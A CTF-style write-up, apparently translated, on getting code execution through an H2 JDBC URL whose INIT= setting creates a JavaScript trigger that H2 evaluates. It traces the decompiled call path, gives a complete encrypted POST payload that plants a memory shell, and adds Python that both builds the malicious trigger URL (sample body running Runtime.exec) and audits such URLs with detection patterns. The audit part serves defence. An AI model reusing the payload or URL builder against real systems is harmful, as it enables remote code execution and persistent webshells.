        Trigger var10000;
        try {
            if (SourceCompiler.isJavaxScriptSource(this.triggerSource)) {
                var10000 = (Trigger)var1.getCompiledScript(var3).eval(); // here: the trigger source is compiled as a script and evaluated
                return var10000;
            }
            ...

There is obviously an eval running the JS source. How does execution get here?

private synchronized void load() {
    if (this.triggerCallback == null) {
        try {
            Session var1 = this.database.getSystemSession();
            JdbcConnection var2 = var1.createConnection(false);
            Object var3;
            if (this.triggerClassName != null) {
                var3 = JdbcUtils.loadUserClass(this.triggerClassName).getDeclaredConstructor().newInstance();
            } else {
                var3 = this.loadFromSource(); // here: no class name given, so the AS $$...$$ source is used
            }
            ...

I searched for a long time and still don't know how load() gets reached; execution jumps into load() right after this line:

public ResultWithGeneratedKeys update(Object var1) {
    this.recompileIfRequired();
    this.setProgress(5);
    this.start();
    this.session.setLastScopeIdentity(ValueNull.INSTANCE);
    this.prepared.checkParameters();
    Object var2;
    if (var1 != null && !Boolean.FALSE.equals(var1)) {
        if (this.prepared instanceof DataChangeStatement && this.prepared.getType() != 58) {
            var2 = this.executeUpdateWithGeneratedKeys((DataChangeStatement)this.prepared, var1);
        } else {
            var2 = new WithKeys(this.prepared.update(), this.session.getDatabase().getResultFactory().create());
        }
    } else {
        var2 = ResultWithGeneratedKeys.of(this.prepared.update()); // here: runs the prepared init= statement
    }
    ...

Here `prepared` is the statement given after `init=` in the payload. (In H2's sources the path continues CreateTrigger.update() -> new TriggerObject -> setTriggerSource(), which calls load() immediately; the JavaScript is therefore compiled and evaluated when the CREATE TRIGGER statement itself executes on connect, not when INFORMATION_SCHEMA.TABLES is first selected.)

private static boolean isJavascriptSource(String var0) {
        return var0.startsWith("//javascript");
    }

That method decides by prefix whether the source is JavaScript, and then it goes straight to eval. Honestly I'm still a bit lost. But I did learn a new way to plant a memory shell, very neat.
Final payload (POST body):

operation=aN/9WhvoOLU%3d24Ve7b7Py0RB3XVCS%2bCtug%3d%3d&params=aN/9WhvoOLU%3d9bhN7FeEb4ZgpJe7f85ZXdfIf4tDAhlt0TzFmAeOJxVPcFpt9Dz02YhvE4uvDt/vEvY3MZxmRLD7BQxaw%2buc7jlnrM9ixVDg1zT0itdHUhYZsspGx5KmOSpnNXWoAEsVpic7Qh6exaIP2/znEZC3kP643GtK/ZIxLs0rNcxRPjIrjMwcaURT4ue2qBMX7RGO/sG1ddpemBdvr192CYZeXPyIQoFvmG0yKsSm3pQvx1CY6wIQWeJxvRg65a5Hak09Wmm6cjSTuXqg0nYWDaf/mzZU9QQvcywqJIcgmM2Rpk4dXhhp7yGIJsA%2bHi70j%2bQ3fxY8PW6bhuLxS
nE0z98UpbrmjuaD2m0ygdqfSNjOGVW4B1Tw/OMVb8XoZm7SpvkOqT6vevSx%2b%2bSI%2b%2b6V0QIOwSoQRpSqMtGFz1TeE0d2NDPnnh%2bLj7z%2bt6ghnH2YusFf2DN9m8AaA6TEZa/gZer47g5mut4CGV0Tm8rzVB9L8ENLWdhMH%2bJ7%2bVk5o5XEKvpmAcbcc/%2b%2bfnHqV6lEXIr/ojcttHMuZdTZke0IkFC52/VE5yNSJ940pyJU05PA5N7YLbvgownivob4wF1SG8JpIB3YeT5oUC0rmmcyaYCB29lJZTYO0YexAXdDxajZIiIvPnKLLK3sKOI%2btRHBx5q%2blk9m5mZubpcwxjq7mOr1%2bMY7dJgfVwSiZxBKx6Ed%2bdmR/%2bPvDwqyQbBnUitK4GY9iMT2oo9JdptZkTcnt7W%2b9g%2b0KlEFd0TMGiXnYlKxq5kjqDQgKxEG2Xcnq7zw%2begn4m4lKx30rdNjPkFgze9dXk/awQREasFtfUGihgLqH%2bOC5G/nJwoMOu4DNhWA3qpc5rBoZ%2bjnBmwd81piMMl2DO/ofAjf3qBgwF353ZW890zfVD0P5uqZhKt1voFJJL23DeRd7ZxU9w39DTpmb52H/IXJ%2b58nfslrV%2bqPMxOhnqYhhouWE70Pbk91Nzq3iBIcyco4YEP0F5l4GSauFW47xviDMX56haaor/AWt0WywFPa7yOeB0PASQ4y9P6GN2y1K0B0/2WwDwM06Pf0UXGVNBCEmdeCDJ9hBQdBl/u3M3PXho26msCCUjf5GKKx9pw8ZfYpAMRHaGBfDzmmPMnCXD28K4tfoQuq5rvzlLZMPRcho20Q1eA8bW/1oNTL68A6ChYIhxIIVHbD48d%2bbObOVYPzkGMRCXZRkza2zCzr3pyiSAtRjPUnGyBpwfTjfAlDt5Qb1ZASrMBcR9jFP5ar/pFKWCTw%2b2Y1p7GmWhot9FrUyPvXJIj6WkXOi3a2%2bKHInGIg2Xy0BHRBjpdBk1n4DH%2bHcTfBbRZxNBqmlvMjB7GLGV5oUaB0N8lbt2ZNndsx9LZYIaqVrlhIAwQ6l8m%2bJm7cViE%2bmmkjRbk8jAX336COZacN84DfP6mgNYIJ8///pajXFQyK6pZUVxMRbXdv8gose/c6IZMyBOpJNgR3D/LIWbHCq4cPoCosWTrvzcKcRwJyCJzoJXyOYTNFOsanM2gCQBHv%2bc50Gzby9PUIALZBL3/TTEuvoJK/XggP9c7SzlJgTANM/NBtketblPOx6h18v1MYpiR4R5uKKe63B6GIdqYXMAvuU%2bvDW4xEeBrEztnRsPKE4dV8CkQjxZEVCtyQ1xedHP718ttbW/E8tQ76mFZZCK9FsV73JQV7du4fhzcFId4lfHOrRa03m%2bDgecrtcHv%2bHE6g1fXm57unbWMTR6QYg95DnPhkMhjb%2bbSOBYAwITHYXmw3wSmU739jJynZN/uVY%2bJ5mIOj2HuUOFBgde1EbMXcmf7m4tnGqkrBrA5VU7WsCOPUzSO3eoTGHOHIcasBAPLMIfNy44clRa/jheML3SdFnWCulSBPm1F3SvqE3WSSF9rVsJjgB86bQF5ASoPxXk%2b25a7hgi%2b5aeYaj9roUafIsWxEl2BRGcHunOPOhRqYEDr3GoVpAe2O7X09Qoj/vgz3guFwotSglrUF/WhySYScwZQ4DU2V3W3pfhRUi0GgJAUPVBEBInJfEytswgFsSqd6nqm7TkJ/Z5lkCIRXa8ltfn0a4tI3P3ZInzFkdRKliPpQAo6miMp3V7ID%2bfHy/ljWZIzmFEEgLxbontMxsX%2bAwpBsedOgaOXopaToPfZr%2bDyuT1wqp2je6pLvxlP1PSuZx6PY2X61ujzziATBhXL5agSX3xieHbonNnFvRANsLpmHjXGuTMyElLCwg6XiQPUzDKLiFFaQNTTO11IS/xa/XoGP0DFB2xvcRgzZ0cWH0K0SSXcI8FCBH7AFPz4EsRMO2sba%2bKOHtUDNBkjXu/H4kQfDzjfaN5pGjyAbWS%2bRVYbCKiYySsVTqB1Ql4lJjzu6VliBwzH/CornUZf8hMmh3JeoqUNgJdpyTMAoSMRjS1iv52Q59fSIapThOSWuuh2b2Xshz6%2bcSdaZaVGE4E6SXlo5Q1vebhHNLKMigN1LLJ1EudZjliFQjGBzYx6kM7lPIRalES75UGBdy6FAq7NVHZgVYaskHX7iANrFPIAWVKbNrsyv0qG4WWXS5ZFeSaSUsB1KP4BQi6T6cATH7u0KAdD206kB7C1TDZWhCpIRwVTONDZBqOxvFszDs6%2bnci/Qs8rGZ5KK/Vir1h90pCFlZmWRtaO63ihfbTLvsIKwcsTscwGG40shR8SER5kPwqtQ9kDw3QVrqWirohBwRF7nFevQUeugL6m9o7lqkN9QZOc8EQQJE/%2btl178Vi/EtXHHjOCSBEid5E%2bwoceNkkKlJ50izbOqequpjojyO5w1SABR4FzoW%2bY2lg6O%2bmAJp9HihQfrFETIencjJbdxLBeNZWhJFJZ%2bSrf0OwDMt/r3e91XoIoAZTOeo9yYMUqYHH75fb7FaaCX4YDu9CbI/WEVh7wNTXKk6PGZwh%2bBzs8QFQUeLnuT1pj64eQyy%2b2Owf0OvxcMnyTd9UWdy9gzr7mzw944%2b8GnyElwFpFpjPcJ6TYMtxYk/DcqG2YSOfSRtPL%2bxRM/3i87P7jqyXUql%2bVHFnUE0r4yn5bV2vxq%2bLoVUhMid6vR9HuyE80pAIvyzkHMuMVYsADlPv8tTsiPQMReIqF5o3cM83ntdb92Jb8kw/1aM2sioyzHG%2bOGAplrc7SsAR6%2bq/Lb2GFS18Pcwz8nGRdeyWvt7Wya05YpjNHRtaDt/MYKRIJqtlkKKO/EYF/3ZEDbEXtH%2b0xRpESsMiCjHzds/Smfte1ssGw/3bfms7O8zUuNCJ3exrEuKdDz2IaFwpjsTL9FA4ABUukd6j9FPgd2m9vCtpNTfuOYrpngzsH0DuC5Lku0jQHiHJDyE7AKNNuW/HD3k3VMNbp7S8BrAP89XncV/7vFg5PB5aY/CAtiLkOtuQnN7q6EHj03rQBQ7ZvFLtA0VIzaKX5k4q%2b2DA9onXTSsIVyouX%2beDgmOoTJYfv2QgQ350zeovzc3qpWdNPWttE9Af1w0PGdCh4uESg4DNVtVbsYPvKtLH70S2uxgpz3NYUrTOHzvSXyXSxOTLHucok5fTDHtym6ee00z8inB%2bI%2bWD36oqrqN5A1pI02v0xagW8dvavnkytyeSEz8rfhtGk19lNsHxyveEFK43GCpu7pZjOL%2bhojrs8Bh8KMOmJuGmdljIWXSr5mep7zUDfaXWqkH3te/XHqU3APniEThfivwpgnR7scCMwFdkPgA9BcDk41ZJM4N507tETc6GjfHO8WfJuATiNM76YiHTV11LpeDwTPhFqJ550QeL7tSY2HDy8lsyBcrcMwhB5%2bViaeCjwWKxSvCCEDbP2ePpuGvQEK0QeJFslI6PFyHpmN//wcMYSSmbS1MrqSwv6k29T2fVlFteIn2QPCUQ%2bcFrZONWCvIINcuF5rEY2EpcYyX0LOkBm%2b3wiHHEQILDD0oNrrCt8xTUYbQi3OeEXYSddxICnaLWzqGzrl3YQwJigZEfE05BCTvNOchOI0lFhzi%2besMhFavyyViaAhEnbtyBCrBEN5AO8Oiobx0EOzGVKy8LIvvdI1DEeRoRn3bir18qCQZpM3c/8eKFOlJFUcq0bsgyFABdXg05Fobda0A4XdgRLFiptCSMQab89wDawXMz%2bCaC0lUuzYkziD%2bkrNZHaqIlOVJDFMkZow%3d%3d
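As an added example that is not part of the writeup, the Python below assembles an H2 JDBC URL of the kind the exp above feeds to druid, and audits such URLs the way any code that lets callers choose a driver class and JDBC URL (the challenge's createPool operation) should before handing them to the driver. The splitting rule it relies on is H2's own: settings are separated by `;`, which is why the trigger body cannot contain one. The database name, trigger name and the sample JavaScript body are this example's; nothing here encrypts with the challenge's SecurityHelper.

```python
import re

# The H2 setting the exp abuses: INIT= runs arbitrary SQL on every new connection.
DANGEROUS_SETTINGS = {"INIT": "runs arbitrary SQL on every new connection"}

# Statements inside INIT= that define executable code: Java/JavaScript trigger or alias
# source, or a script loaded from a file or URL.
CODE_DEFINING_SQL = re.compile(
    r"CREATE\s+(?:FORCE\s+)?(?:TRIGGER|ALIAS)\b|RUNSCRIPT\s+FROM|\$\$//javascript|\$\$//groovy",
    re.IGNORECASE,
)


def split_h2_url(url):
    """Split 'jdbc:h2:<db>;KEY=VALUE;...' into (db, {KEY: VALUE}).
    H2 separates settings with ';', which is exactly why the JS body must not contain one."""
    prefix = "jdbc:h2:"
    if not url.lower().startswith(prefix):
        raise ValueError("not an H2 JDBC URL")
    db, *settings = url[len(prefix):].split(";")
    parsed = {}
    for item in settings:
        key, sep, value = item.partition("=")
        if sep:
            parsed[key.strip().upper()] = value
    return db, parsed


def build_trigger_url(js_body, db="mem:test", trigger="edi"):
    """Assemble the init= trigger URL used in the exp (db and trigger names are this example's).
    Refuses a body containing ';' because H2 would end the init= setting there."""
    if ";" in js_body:
        raise ValueError("';' terminates the init= setting; rewrite the JavaScript without it")
    init = (
        f"CREATE TRIGGER {trigger} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS "
        f"$$//javascript\n{js_body}\n$$"
    )
    return f"jdbc:h2:{db};MODE=MSSQLServer;init={init}"


def is_accepted_js_body(js_body):
    """True when build_trigger_url() accepts the body."""
    try:
        build_trigger_url(js_body)
        return True
    except ValueError:
        return False


def audit_h2_url(url):
    """Findings for a user-supplied H2 URL before it reaches DriverManager; empty means benign.
    A pool that lets callers pick driver class and URL should reject anything this returns."""
    _db, settings = split_h2_url(url)
    findings = []
    for key, why in DANGEROUS_SETTINGS.items():
        if key in settings:
            findings.append(f"{key}= present: {why}")
    if CODE_DEFINING_SQL.search(settings.get("INIT", "")):
        findings.append("INIT= defines executable code (TRIGGER/ALIAS/RUNSCRIPT or script source)")
    return findings


if __name__ == "__main__":
    # Sample body for demonstration only, not the exp's memory-shell loader.
    url = build_trigger_url("java.lang.Runtime.getRuntime().exec('id')")
    for finding in audit_h2_url(url):
        print(finding)
```

The audit is deliberately coarse: an application that needs to accept user-controlled JDBC URLs at all should allow-list the driver class and strip every setting it does not explicitly expect, rather than try to enumerate the dangerous ones.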